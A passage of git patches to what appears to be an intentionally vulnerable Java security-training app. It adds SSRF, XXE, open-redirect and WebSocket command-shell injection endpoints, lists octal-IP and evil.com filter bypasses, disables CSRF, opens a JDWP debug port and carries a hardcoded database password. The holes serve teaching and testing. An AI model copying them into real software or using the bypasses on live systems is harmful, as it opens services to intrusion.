+     * <a href="http://127.0.0.1:8080/ssrf/hutool/vuln?url=http://www.baidu.com">http://127.0.0.1:8080/ssrf/hutool/vuln?url=http://www.baidu.com</a>
      */
     @GetMapping("/hutool/vuln")
     public String hutoolHttp(String url){
@@ -309,4 +301,18 @@ public String hutoolHttp(String url){
     }
 
 
+    /**
+     * DnsRebind SSRF in java by setting ttl is zero. <br>
+     * <a href="http://localhost:8080/ssrf/dnsrebind/vuln?url=http://test.joychou.org">http://localhost:8080/ssrf/dnsrebind/vuln?url=dnsrebind_url</a>
+     */
+    @GetMapping("/dnsrebind/vuln")
+    public String DnsRebind(String url) {
+        java.security.Security.setProperty("networkaddress.cache.negative.ttl" , "0");
+        if (!SecurityUtil.checkSSRFWithoutRedirect(url)) {
+            return "Dangerous url";
+        }
+        return HttpUtil.get(url);
+    }
+
+
 }
diff --git a/src/main/java/org/joychou/controller/WebSockets.java b/src/main/java/org/joychou/controller/WebSockets.java
new file mode 100644
index 00000000..6a477ece
--- /dev/null
+++ b/src/main/java/org/joychou/controller/WebSockets.java
@@ -0,0 +1,76 @@
+package org.joychou.controller;
+
+import org.apache.tomcat.websocket.server.WsServerContainer;
+import org.joychou.config.WebSocketsProxyEndpoint;
+import org.joychou.config.WebSocketsCmdEndpoint;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RestController;
+
+import javax.servlet.ServletContext;
+import javax.servlet.http.HttpServletRequest;
+import javax.websocket.server.ServerContainer;
+import javax.websocket.server.ServerEndpointConfig;
+
+
+@RestController
+public class WebSockets {
+
+    /**
+     * <p>动态添加WebSockets实现命令执行</p>
+     * <p>
+     * 1. WebSocket的端口和Spring端口一致。<br>
+     * 2. 如果应用需要登录，动态添加的WebSocket路由不能要求被登录，否则添加失败。
+     * </p>
+     * <p>
+     *    <a href="http://localhost:8080/websocket/cmd?path=/ws/shell">http://localhost:8080/websocket/cmd?path=/ws/shell</a> <br>
+     *    WebSockets 的URL为ws://127.0.0.1:8080/ws/shell
+     * </p>
+     * <p>JoyChou @ 2023年02月20日 </p>
+     */
+    @RequestMapping("/websocket/cmd")
+    public String cmdInject(HttpServletRequest req) {
+        String path = req.getParameter("path");
+        if (path == null) {
+            return "path is null";
+        }
+        ServletContext sc = req.getServletContext();
+        try {
+            ServerEndpointConfig sec = ServerEndpointConfig.Builder.create(WebSocketsCmdEndpoint.class, path).build();
+            WsServerContainer wsc = (WsServerContainer) sc.getAttribute(ServerContainer.class.getName());
+            if (wsc.findMapping(path) == null) {
+                wsc.addEndpoint(sec);
+                System.out.println("[+] Websocket: " + path + " inject success!!!");
+                return "[+] Websocket: " + path + " inject success!!!";
+            } else {
+                System.out.println("[-] Websocket: " + path + " has been injected!");
+                return "[-] Websocket: " + path + " has been injected!";
+            }
+        } catch (Exception e) {
+            return e.toString();
+        }
+    }
+
+    @RequestMapping("/websocket/proxy")
+    public String proxyInject(HttpServletRequest req) {
+        String path = req.getParameter("path");
+        if (path == null) {
+            return "path is null";
+        }
+        ServletContext sc = req.getServletContext();
+        try {
+            ServerEndpointConfig sec = ServerEndpointConfig.Builder.create(WebSocketsProxyEndpoint.class, path).build();
+            WsServerContainer wsc = (WsServerContainer) sc.getAttribute(ServerContainer.class.getName());
+            if (wsc.findMapping(path) == null) {
+                wsc.addEndpoint(sec);
+                System.out.println("[+] Websocket: " + path + " inject success!!!");
+                return "[+] Websocket: " + path + " inject success!!!";
+            } else {
+                System.out.println("[-] Websocket: " + path + " has been injected!");
+                return "[-] Websocket: " + path + " has been injected!";
+            }
+        } catch (Exception e) {
+            return e.toString();
+        }
+    }
+
+}
diff --git a/src/main/java/org/joychou/controller/XXE.java b/src/main/java/org/joychou/controller/XXE.java
index 931a5688..14b6a232 100644
--- a/src/main/java/org/joychou/controller/XXE.java
+++ b/src/main/java/org/joychou/controller/XXE.java
@@ -252,8 +252,9 @@ public String DocumentBuilderVuln01(HttpServletRequest request) {
             sr.close();
             return buf.toString();
         } catch (Exception e) {
+            e.printStackTrace();
             logger.error(e.toString());
-            return EXCEPT;
+            return e.toString();
         }
     }
 
diff --git a/src/main/java/org/joychou/security/WebSecurityConfig.java b/src/main/java/org/joychou/security/WebSecurityConfig.java
index 9d90c698..414fd24d 100644
--- a/src/main/java/org/joychou/security/WebSecurityConfig.java
+++ b/src/main/java/org/joychou/security/WebSecurityConfig.java
@@ -34,6 +34,11 @@ public class WebSecurityConfig extends WebSecurityConfigurerAdapter {
     @Value("${joychou.security.csrf.exclude.url}")
     private String[] csrfExcludeUrl;
 
+
+    @Value("${joychou.no.need.login.url}")
+    private String[] noNeedLoginUrl;
+
+
     @Value("${joychou.security.csrf.method}")
     private String[] csrfMethod = {"POST"};
 
@@ -69,7 +74,7 @@ protected void configure(HttpSecurity http) throws Exception {
 
         // spring security login settings
         http.authorizeRequests()
-                .antMatchers("/css/**", "/js/**").permitAll() // permit static resources
+                .antMatchers(noNeedLoginUrl).permitAll() // no need to login page
                 // CVE-2022-22978漏洞代码
                 .regexMatchers("/black_path.*").denyAll()    // 如果正则匹配到/black_path，则forbidden
                 .anyRequest().authenticated().and() // any request authenticated except above static resources
diff --git a/src/main/java/org/joychou/security/ssrf/SSRFChecker.java b/src/main/java/org/joychou/security/ssrf/SSRFChecker.java
index 0930e2b5..70f744ad 100644
--- a/src/main/java/org/joychou/security/ssrf/SSRFChecker.java
+++ b/src/main/java/org/joychou/security/ssrf/SSRFChecker.java
@@ -16,7 +16,8 @@
 
 public class SSRFChecker {
 
-    private static Logger logger = LoggerFactory.getLogger(SSRFChecker.class);
+    private static final Logger logger = LoggerFactory.getLogger(SSRFChecker.class);
+    private static String decimalIp;
 
     public static boolean checkURLFckSSRF(String url) {
         if (null == url) {
@@ -125,7 +126,7 @@ public static boolean isInternalIpByUrl(String url) {
      * @param strIP ip字符串
      * @return 如果是内网ip，返回true，否则返回false。
      */
-    static boolean isInternalIp(String strIP) {
+    public static boolean isInternalIp(String strIP) {
         if (StringUtils.isEmpty(strIP)) {
             logger.error("[-] SSRF check failed. IP is empty. " + strIP);
             return true;
@@ -144,15 +145,43 @@ static boolean isInternalIp(String strIP) {
 
     }
 
+
     /**
-     * host转换为IP
-     * 会将各种进制的ip转为正常ip
-     * 167772161 转换为  10.0.0.1
-     * 127.0.0.1.xip.io 转换为 127.0.0.1
+     * Convert host to decimal ip.
+     * Since there is a bypass in octal using {@link InetAddress#getHostAddress()},
+     * the function of converting octal to decimal is added.
+     * If it still can be bypassed, please submit
+     * <a href="https://github.com/JoyChou93/java-sec-code/pulls">PullRequests</a> or
+     * <a href="https://github.com/JoyChou93/java-sec-code/issues">Issues</a>.<br>
      *
-     * @param host 域名host
+     * <p>Normal:</p>
+     * <ul>
+     *    <li>69299689 to 10.23.78.233</li>
+     *    <li>69299689 to 10.23.78.233 </li>
+     *    <li>012.0x17.78.233 to 10.23.78.233 </li>
+     *    <li>012.027.0116.0351 to 10.23.78.233</li>
+     *    <li>127.0.0.1.xip.io to 127.0.0.1</li>
+     *    <li>127.0.0.1.nip.io to 127.0.0.1</li>
+     * </ul>
+
+     * <p>Bypass: </p>
+     * <ul>
+     *     <li>01205647351 to 71.220.183.247, actually 10.23.78.233</li>
+     *     <li>012.23.78.233 to 12.23.78.233, actually 10.23.78.233</li>
+     * </ul>
+     * @return decimal ip
      */
-    private static String host2ip(String host) {
+    public static String host2ip(String host) {
+
+        if (null == host) {
+            return "";
+        }
+
+        // convert octal to decimal
+         if(isOctalIP(host)) {
+             host = decimalIp;
+         }
+
         try {
             InetAddress IpAddress = InetAddress.getByName(host); //  send dns request
             return IpAddress.getHostAddress();
@@ -161,14 +190,90 @@ private static String host2ip(String host) {
         }
     }
 
+
     /**
-     * 从URL中获取host，限制为http/https协议。只支持http:// 和 https://，不支持//的http协议。
-     *
-     * @param url http的url
+     * Check whether the host is an octal IP, if so, convert it to decimal.
+     * @return Octal ip returns true, others return false. 012.23.78.233 return true. 012.0x17.78.233 return false.
+     */
+    public static boolean isOctalIP(String host) {
+        String[] ipParts = host.split("\\.");
+        StringBuilder newDecimalIP = new StringBuilder();
+        boolean is_octal = false;
+
+        // Octal ip only has number and dot character.
+        if (isNumberOrDot(host)) {
+
+            if (ipParts.length != 1 && ipParts.length != 4) {
+                return false;
+            }
+
+            // 000000001205647351
+            if( ipParts.length == 1 && host.startsWith("0") ) {
+                decimalIp = Integer.valueOf(host, 8).toString();
+                return true;
+            }
+
+            // 0000012.23.78.233
+            for(String ip : ipParts) {
+                if (!isNumber(ip)){
+                    throw new SSRFException("Illegal host: " + host + ".");
+                }
+                if (ip.startsWith("0")) {
+                    if (Integer.valueOf(ip, 8) >= 256){
+                        throw new SSRFException("Illegal host: " + host + ".\t" + ip + " is above 255.");
+                    }
+                    newDecimalIP.append(Integer.valueOf(ip, 8)).append(".");
+                    is_octal = true;
+                }else{
+                    if (Integer.valueOf(ip, 10) >= 256) {
+                        throw new SSRFException("Illegal host: " + host + ".\t" + ip + " is above 255.");
+                    }
+                    newDecimalIP.append(ip).append(".");
+                }
+            }
+            decimalIp = newDecimalIP.substring(0, newDecimalIP.lastIndexOf("."));
+        }
+        return is_octal;
+    }
+
+    /**
+     * Check string is a number.
+     * @return If string is a number 0-9, return true. Otherwise, return false.
+     */
+    private static boolean isNumber(String str) {
+        if (null == str || "".equals(str)) {
+            return false;
+        }
+        for (int i = 0; i < str.length(); i++) {
+            char ch = str.charAt(i);
+            if (ch < 48 || ch > 57) {
+                return false;
+            }
+        }
+        return true;
+    }
+
+
+    /**
+     * Check string is a number or dot.
+     * @return If string is a number or a dot, return true. Otherwise, return false.
+     */
+    private static boolean isNumberOrDot(String s) {
+        for (int i = 0; i < s.length(); i++) {
+            char ch = s.charAt(i);
+            if ((ch < 48 || ch > 57) && ch != 46){
+                return false;
+            }
+        }
+        return true;
+    }
+
+    /**
+     * Get host from URL which the protocol must be http:// or https:// and not be //.
      */
     private static String url2host(String url) {
         try {
-            // 使用URI，而非URL，防止被绕过。
+            // use URI instead of URL
             URI u = new URI(url);
             if (SecurityUtil.isHttp(url)) {
                 return u.getHost();
diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties
index 96ca82c3..d5c6d5ab 100644
--- a/src/main/resources/application.properties
+++ b/src/main/resources/application.properties
@@ -1,5 +1,5 @@
 
-spring.datasource.url=jdbc:mysql://localhost:3306/java_sec_code?AllowPublicKeyRetrieval=true&useSSL=false&serverTimezone=UTC
+spring.datasource.url=jdbc:mysql://localhost:3306/java_sec_code?allowPublicKeyRetrieval=true&useSSL=false&serverTimezone=UTC
 spring.datasource.username=root
 spring.datasource.password=woshishujukumima
 spring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver
@@ -14,7 +14,7 @@ endpoints.enabled=true
 
 # logging.config=classpath:logback-online.xml
 
-# 业务的callback参数，不支持多个
+# jsonp callback parameter
 joychou.business.callback = callback_
 
 
@@ -28,19 +28,30 @@ joychou.security.referer.uri = /jsonp/**
 
 ### csrf configuration begins ###
 # csrf token check
-joychou.security.csrf.enabled = true
+joychou.security.csrf.enabled = false
 # URI without CSRF check (only support ANT url format)
-joychou.security.csrf.exclude.url = /xxe/**, /fastjson/**, /xstream/**, /ssrf/**
+joychou.security.csrf.exclude.url = /xxe/**, /fastjson/**, /xstream/**, /ssrf/**, /deserialize/**
 # method for CSRF check
 joychou.security.csrf.method = POST
 ### csrf configuration ends ###
 
 
-### jsonp configuration begins ###  # auto convert json to jsonp
+### jsonp configuration begins ###
+# auto convert json to jsonp
 # referer check
 joychou.security.jsonp.referer.check.enabled = true
 joychou.security.jsonp.callback = callback, _callback
 ### jsonp configuration ends ###
 
 # swagger
-swagger.enable = true
\ No newline at end of file
+swagger.enable = true
+
+
+### no need to login page begins ###
+joychou.no.need.login.url = /css/**, /js/**, /xxe/**, /rce/**, /deserialize/**, /test/**, /ws/**
+### no need to login page ends ###
+
+
+
+# http header max size
+#server.max-http-header-size=30000

From 621c30050f82379afe1e2e6d4ff66c1234f33913 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Wed, 15 Mar 2023 18:55:18 +0800
Subject: [PATCH 13/20] Add XXE

---
 docker-compose.yml                            |  4 +-
 java-sec-code.iml                             | 20 +++--
 pom.xml                                       | 18 ++++
 .../org/joychou/controller/URLWhiteList.java  | 19 +++--
 src/main/java/org/joychou/controller/XXE.java | 82 ++++++++-----------
 .../joychou/security/ssrf/SSRFChecker.java    | 31 +++----
 src/main/java/org/joychou/util/HttpUtils.java |  1 -
 src/main/java/org/joychou/util/WebUtils.java  |  5 +-
 8 files changed, 98 insertions(+), 82 deletions(-)

diff --git a/docker-compose.yml b/docker-compose.yml
index cb3f8efa..7e9c878e 100644
--- a/docker-compose.yml
+++ b/docker-compose.yml
@@ -1,9 +1,11 @@
-version : '2'
+version : '3'
 services:
     jsc:
         image: joychou/jsc:latest
+        command: ["java", "-Xdebug", "-Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=0.0.0.0:8000", "-jar", "jsc.jar"]
         ports:
             - "8080:8080"
+            - "8000:8000"
         links:
             - j_mysql
 
diff --git a/java-sec-code.iml b/java-sec-code.iml
index 6e093293..a20476ae 100644
--- a/java-sec-code.iml
+++ b/java-sec-code.iml
@@ -38,13 +38,13 @@
     <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-starter-logging:1.5.1.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: ch.qos.logback:logback-classic:1.1.9" level="project" />
     <orderEntry type="library" name="Maven: ch.qos.logback:logback-core:1.1.9" level="project" />
-    <orderEntry type="library" name="Maven: org.slf4j:jcl-over-slf4j:1.7.22" level="project" />
     <orderEntry type="library" name="Maven: org.slf4j:jul-to-slf4j:1.7.22" level="project" />
     <orderEntry type="library" name="Maven: org.slf4j:log4j-over-slf4j:1.7.22" level="project" />
     <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-starter-tomcat:1.5.1.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-core:8.5.11" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-el:8.5.11" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-websocket:8.5.11" level="project" />
+    <orderEntry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-core:8.5.85" level="project" />
+    <orderEntry type="library" name="Maven: org.apache.tomcat:tomcat-annotations-api:8.5.85" level="project" />
+    <orderEntry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-el:8.5.85" level="project" />
+    <orderEntry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-websocket:8.5.85" level="project" />
     <orderEntry type="library" name="Maven: org.hibernate:hibernate-validator:5.3.4.Final" level="project" />
     <orderEntry type="library" name="Maven: javax.validation:validation-api:1.1.0.Final" level="project" />
     <orderEntry type="library" name="Maven: org.jboss.logging:jboss-logging:3.3.0.Final" level="project" />
@@ -127,7 +127,7 @@
     <orderEntry type="library" scope="RUNTIME" name="Maven: com.google.inject.extensions:guice-multibindings:4.0" level="project" />
     <orderEntry type="library" scope="RUNTIME" name="Maven: com.google.inject.extensions:guice-grapher:4.0" level="project" />
     <orderEntry type="library" scope="RUNTIME" name="Maven: com.google.inject.extensions:guice-assistedinject:4.0" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: org.ow2.asm:asm:5.0.4" level="project" />
+    <orderEntry type="library" name="Maven: org.ow2.asm:asm:5.0.4" level="project" />
     <orderEntry type="library" scope="RUNTIME" name="Maven: org.codehaus.woodstox:woodstox-core-asl:4.4.1" level="project" />
     <orderEntry type="library" scope="RUNTIME" name="Maven: javax.xml.stream:stax-api:1.0-2" level="project" />
     <orderEntry type="library" scope="RUNTIME" name="Maven: org.codehaus.woodstox:stax2-api:3.1.4" level="project" />
@@ -170,8 +170,8 @@
     <orderEntry type="library" name="Maven: commons-httpclient:commons-httpclient:3.1" level="project" />
     <orderEntry type="library" name="Maven: org.mybatis.spring.boot:mybatis-spring-boot-starter:1.3.2" level="project" />
     <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-starter-jdbc:1.5.1.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.tomcat:tomcat-jdbc:8.5.11" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.tomcat:tomcat-juli:8.5.11" level="project" />
+    <orderEntry type="library" name="Maven: org.apache.tomcat:tomcat-jdbc:8.5.85" level="project" />
+    <orderEntry type="library" name="Maven: org.apache.tomcat:tomcat-juli:8.5.85" level="project" />
     <orderEntry type="library" name="Maven: org.springframework:spring-jdbc:4.3.6.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: org.springframework:spring-tx:4.3.6.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: org.mybatis.spring.boot:mybatis-spring-boot-autoconfigure:1.3.2" level="project" />
@@ -222,5 +222,11 @@
     <orderEntry type="library" name="Maven: com.auth0:java-jwt:4.0.0" level="project" />
     <orderEntry type="library" name="Maven: cn.hutool:hutool-all:5.8.10" level="project" />
     <orderEntry type="library" name="Maven: org.javassist:javassist:3.27.0-GA" level="project" />
+    <orderEntry type="library" name="Maven: org.springframework.data:spring-data-commons:1.13.11.RELEASE" level="project" />
+    <orderEntry type="library" name="Maven: org.slf4j:jcl-over-slf4j:1.7.22" level="project" />
+    <orderEntry type="library" name="Maven: com.jayway.jsonpath:json-path:2.2.0" level="project" />
+    <orderEntry type="library" name="Maven: net.minidev:json-smart:2.2.1" level="project" />
+    <orderEntry type="library" name="Maven: net.minidev:accessors-smart:1.1" level="project" />
+    <orderEntry type="library" name="Maven: org.xmlbeam:xmlprojector:1.4.13" level="project" />
   </component>
 </module>
\ No newline at end of file
diff --git a/pom.xml b/pom.xml
index 43c5b99a..9ee03372 100644
--- a/pom.xml
+++ b/pom.xml
@@ -12,6 +12,7 @@
     <properties>
         <maven.compiler.source>1.8</maven.compiler.source> <!-- mvn clean package-->
         <maven.compiler.target>1.8</maven.compiler.target>
+        <tomcat.version>8.5.85</tomcat.version>
     </properties>
 
 
@@ -312,6 +313,23 @@
             <version>3.27.0-GA</version>
         </dependency>
 
+        <dependency>
+            <groupId>org.springframework.data</groupId>
+            <artifactId>spring-data-commons</artifactId>
+            <version>1.13.11.RELEASE</version>
+        </dependency>
+
+        <dependency>
+            <groupId>com.jayway.jsonpath</groupId>
+            <artifactId>json-path</artifactId>
+        </dependency>
+
+        <dependency>
+            <groupId>org.xmlbeam</groupId>
+            <artifactId>xmlprojector</artifactId>
+            <version>1.4.13</version>
+        </dependency>
+
     </dependencies>
 
     <dependencyManagement>
diff --git a/src/main/java/org/joychou/controller/URLWhiteList.java b/src/main/java/org/joychou/controller/URLWhiteList.java
index 35d37576..156cc73d 100644
--- a/src/main/java/org/joychou/controller/URLWhiteList.java
+++ b/src/main/java/org/joychou/controller/URLWhiteList.java
@@ -6,7 +6,8 @@
 import org.slf4j.LoggerFactory;
 import org.springframework.web.bind.annotation.*;
 
-import java.net.MalformedURLException;
+import javax.servlet.http.HttpServletResponse;
+import java.io.IOException;
 import java.net.URL;
 import java.util.ArrayList;
 import java.util.regex.Matcher;
@@ -86,20 +87,21 @@ public String regex(@RequestParam("url") String url) {
 
 
     /**
-     * The bypass of using <code>java.net.URL</code> to getHost.
+     * The bypass of using {@link java.net.URL} to getHost.
      * <p>
-     * Bypass poc1: curl -v 'http://localhost:8080/url/vuln/url_bypass?url=http://evel.com%5c@www.joychou.org/a.html'
-     * Bypass poc2: curl -v 'http://localhost:8080/url/vuln/url_bypass?url=http://evil.com%5cwww.joychou.org/a.html'
+     * <a href="http://localhost:8080/url/vuln/url_bypass?url=http://evil.com%5c@www.joychou.org/a.html">bypass 1</a>
+     * <a href="http://localhost:8080/url/vuln/url_bypass?url=http://evil.com%5cwww.joychou.org/a.html">bypass 2</a>
+     *
      * <p>
-     * More details: https://github.com/JoyChou93/java-sec-code/wiki/URL-whtielist-Bypass
+     * <a href="https://github.com/JoyChou93/java-sec-code/wiki/URL-whtielist-Bypass">More details</a>
      */
     @GetMapping("/vuln/url_bypass")
-    public String url_bypass(String url) throws MalformedURLException {
+    public void url_bypass(String url, HttpServletResponse res) throws IOException {
 
         logger.info("url:  " + url);
 
         if (!SecurityUtil.isHttp(url)) {
-            return "Url is not http or https";
+            return;
         }
 
         URL u = new URL(url);
@@ -109,11 +111,10 @@ public String url_bypass(String url) throws MalformedURLException {
         // endsWith .
         for (String domain : domainwhitelist) {
             if (host.endsWith("." + domain)) {
-                return "Good url.";
+                res.sendRedirect(url);
             }
         }
 
-        return "Bad url.";
     }
 
 
diff --git a/src/main/java/org/joychou/controller/XXE.java b/src/main/java/org/joychou/controller/XXE.java
index 14b6a232..36372727 100644
--- a/src/main/java/org/joychou/controller/XXE.java
+++ b/src/main/java/org/joychou/controller/XXE.java
@@ -4,6 +4,9 @@
 import org.dom4j.io.SAXReader;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
+import org.springframework.data.web.ProjectedPayload;
+import org.springframework.http.HttpEntity;
+import org.springframework.http.ResponseEntity;
 import org.springframework.web.bind.annotation.*;
 
 import javax.servlet.http.HttpServletRequest;
@@ -27,6 +30,7 @@
 import org.apache.commons.digester3.Digester;
 import org.jdom2.input.SAXBuilder;
 import org.joychou.util.WebUtils;
+import org.xmlbeam.annotation.XBRead;
 
 /**
  * Java xxe vuln and security code.
@@ -38,8 +42,8 @@
 @RequestMapping("/xxe")
 public class XXE {
 
-    private static Logger logger = LoggerFactory.getLogger(XXE.class);
-    private static String EXCEPT = "xxe except";
+    private static final Logger logger = LoggerFactory.getLogger(XXE.class);
+    private static final String EXCEPT = "xxe except";
 
     @PostMapping("/xmlReader/vuln")
     public String xmlReaderVuln(HttpServletRequest request) {
@@ -226,16 +230,15 @@ public String DigesterSec(HttpServletRequest request) {
     }
 
 
-    // 有回显
-    @RequestMapping(value = "/DocumentBuilder/vuln01", method = RequestMethod.POST)
+    /**
+     * Use request.getInputStream to support UTF16 encoding.
+     */
+    @RequestMapping(value = "/DocumentBuilder/vuln", method = RequestMethod.POST)
     public String DocumentBuilderVuln01(HttpServletRequest request) {
         try {
-            String body = WebUtils.getRequestBody(request);
-            logger.info(body);
             DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
             DocumentBuilder db = dbf.newDocumentBuilder();
-            StringReader sr = new StringReader(body);
-            InputSource is = new InputSource(sr);
+            InputSource is = new InputSource(request.getInputStream());
             Document document = db.parse(is);  // parse xml
 
             // 遍历xml节点name和value
@@ -249,7 +252,6 @@ public String DocumentBuilderVuln01(HttpServletRequest request) {
                     buf.append(String.format("%s: %s\n", node.getNodeName(), node.getTextContent()));
                 }
             }
-            sr.close();
             return buf.toString();
         } catch (Exception e) {
             e.printStackTrace();
@@ -258,43 +260,6 @@ public String DocumentBuilderVuln01(HttpServletRequest request) {
         }
     }
 
-
-    // 有回显
-    @RequestMapping(value = "/DocumentBuilder/vuln02", method = RequestMethod.POST)
-    public String DocumentBuilderVuln02(HttpServletRequest request) {
-        try {
-            String body = WebUtils.getRequestBody(request);
-            logger.info(body);
-
-            DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
-            DocumentBuilder db = dbf.newDocumentBuilder();
-            StringReader sr = new StringReader(body);
-            InputSource is = new InputSource(sr);
-            Document document = db.parse(is);  // parse xml
-
-            // 遍历xml节点name和value
-            StringBuilder result = new StringBuilder();
-            NodeList rootNodeList = document.getChildNodes();
-            for (int i = 0; i < rootNodeList.getLength(); i++) {
-                Node rootNode = rootNodeList.item(i);
-                NodeList child = rootNode.getChildNodes();
-                for (int j = 0; j < child.getLength(); j++) {
-                    Node node = child.item(j);
-                    // 正常解析XML，需要判断是否是ELEMENT_NODE类型。否则会出现多余的的节点。
-                    if (child.item(j).getNodeType() == Node.ELEMENT_NODE) {
-                        result.append(String.format("%s: %s\n", node.getNodeName(), node.getFirstChild()));
-                    }
-                }
-            }
-            sr.close();
-            return result.toString();
-        } catch (Exception e) {
-            logger.error(e.toString());
-            return EXCEPT;
-        }
-    }
-
-
     @RequestMapping(value = "/DocumentBuilder/Sec", method = RequestMethod.POST)
     public String DocumentBuilderSec(HttpServletRequest request) {
         try {
@@ -447,6 +412,31 @@ private static void response(NodeList rootNodeList){
         }
     }
 
+        /**
+         * Receiving POST requests supporting both JSON and XML.
+         * CVE-2018-1259
+         */
+        @PostMapping(value = "/xmlbeam/vuln")
+        HttpEntity<String> post(@RequestBody UserPayload user) {
+            try {
+                logger.info(user.toString());
+                return ResponseEntity.ok(String.format("hello, %s!", user.getUserName()));
+            }catch (Exception e){
+                e.printStackTrace();
+                return ResponseEntity.ok("error");
+            }
+        }
+
+        /**
+         * The projection interface using XPath and JSON Path expression to selectively pick elements from the payload.
+         */
+        @ProjectedPayload
+        public interface UserPayload {
+            @XBRead("//userName")
+            String getUserName();
+        }
+
+
     public static void main(String[] args)  {
     }
 
diff --git a/src/main/java/org/joychou/security/ssrf/SSRFChecker.java b/src/main/java/org/joychou/security/ssrf/SSRFChecker.java
index 70f744ad..71abc91e 100644
--- a/src/main/java/org/joychou/security/ssrf/SSRFChecker.java
+++ b/src/main/java/org/joychou/security/ssrf/SSRFChecker.java
@@ -157,7 +157,6 @@ public static boolean isInternalIp(String strIP) {
      * <p>Normal:</p>
      * <ul>
      *    <li>69299689 to 10.23.78.233</li>
-     *    <li>69299689 to 10.23.78.233 </li>
      *    <li>012.0x17.78.233 to 10.23.78.233 </li>
      *    <li>012.027.0116.0351 to 10.23.78.233</li>
      *    <li>127.0.0.1.xip.io to 127.0.0.1</li>
@@ -166,8 +165,10 @@ public static boolean isInternalIp(String strIP) {
 
      * <p>Bypass: </p>
      * <ul>
-     *     <li>01205647351 to 71.220.183.247, actually 10.23.78.233</li>
-     *     <li>012.23.78.233 to 12.23.78.233, actually 10.23.78.233</li>
+     *     <li>01205647351 {@link InetAddress#getHostAddress()} result is 71.220.183.247, actually 10.23.78.233</li>
+     *     <li>012.23.78.233 {@link InetAddress#getHostAddress()} result is 12.23.78.233, actually 10.23.78.233</li>
+     *     <li>012.23.233 {@link InetAddress#getHostAddress()} result is  12.23.0.233, actually 10.23.0.233</li>
+     *     <li>012.233 {@link InetAddress#getHostAddress()} result is 12.0.0.233, actually 10.0.0.233</li>
      * </ul>
      * @return decimal ip
      */
@@ -177,13 +178,14 @@ public static String host2ip(String host) {
             return "";
         }
 
-        // convert octal to decimal
+         // convert octal to decimal
          if(isOctalIP(host)) {
              host = decimalIp;
          }
 
         try {
-            InetAddress IpAddress = InetAddress.getByName(host); //  send dns request
+            // send dns request
+            InetAddress IpAddress = InetAddress.getByName(host);
             return IpAddress.getHostAddress();
         } catch (Exception e) {
             return "";
@@ -203,30 +205,31 @@ public static boolean isOctalIP(String host) {
         // Octal ip only has number and dot character.
         if (isNumberOrDot(host)) {
 
-            if (ipParts.length != 1 && ipParts.length != 4) {
-                return false;
+            // not support ipv6
+            if (ipParts.length > 4) {
+                throw new SSRFException("Illegal ipv4: " + host);
             }
 
-            // 000000001205647351
+            // 01205647351
             if( ipParts.length == 1 && host.startsWith("0") ) {
                 decimalIp = Integer.valueOf(host, 8).toString();
                 return true;
             }
 
-            // 0000012.23.78.233
+            // 012.23.78.233
             for(String ip : ipParts) {
                 if (!isNumber(ip)){
-                    throw new SSRFException("Illegal host: " + host + ".");
+                    throw new SSRFException("Illegal ipv4: " + host);
                 }
                 if (ip.startsWith("0")) {
                     if (Integer.valueOf(ip, 8) >= 256){
-                        throw new SSRFException("Illegal host: " + host + ".\t" + ip + " is above 255.");
+                        throw new SSRFException("Illegal ipv4: " + host);
                     }
                     newDecimalIP.append(Integer.valueOf(ip, 8)).append(".");
                     is_octal = true;
                 }else{
                     if (Integer.valueOf(ip, 10) >= 256) {
-                        throw new SSRFException("Illegal host: " + host + ".\t" + ip + " is above 255.");
+                        throw new SSRFException("Illegal ipv4: " + host);
                     }
                     newDecimalIP.append(ip).append(".");
                 }
@@ -246,7 +249,7 @@ private static boolean isNumber(String str) {
         }
         for (int i = 0; i < str.length(); i++) {
             char ch = str.charAt(i);
-            if (ch < 48 || ch > 57) {
+            if (ch < '0' || ch > '9') {
                 return false;
             }
         }
@@ -261,7 +264,7 @@ private static boolean isNumber(String str) {
     private static boolean isNumberOrDot(String s) {
         for (int i = 0; i < s.length(); i++) {
             char ch = s.charAt(i);
-            if ((ch < 48 || ch > 57) && ch != 46){
+            if ((ch < '0' || ch > '9') && ch != '.'){
                 return false;
             }
         }
diff --git a/src/main/java/org/joychou/util/HttpUtils.java b/src/main/java/org/joychou/util/HttpUtils.java
index 2c248b29..c1eac95c 100644
--- a/src/main/java/org/joychou/util/HttpUtils.java
+++ b/src/main/java/org/joychou/util/HttpUtils.java
@@ -94,7 +94,6 @@ public static String URLConnection(String url) {
             URL u = new URL(url);
             URLConnection urlConnection = u.openConnection();
             BufferedReader in = new BufferedReader(new InputStreamReader(urlConnection.getInputStream())); //send request
-            // BufferedReader in = new BufferedReader(new InputStreamReader(u.openConnection().getInputStream()));
             String inputLine;
             StringBuilder html = new StringBuilder();
 
diff --git a/src/main/java/org/joychou/util/WebUtils.java b/src/main/java/org/joychou/util/WebUtils.java
index 4816df8e..0445f310 100644
--- a/src/main/java/org/joychou/util/WebUtils.java
+++ b/src/main/java/org/joychou/util/WebUtils.java
@@ -2,9 +2,7 @@
 
 import javax.servlet.http.Cookie;
 import javax.servlet.http.HttpServletRequest;
-import java.io.File;
-import java.io.IOException;
-import java.io.InputStream;
+import java.io.*;
 
 import com.google.common.base.Preconditions;
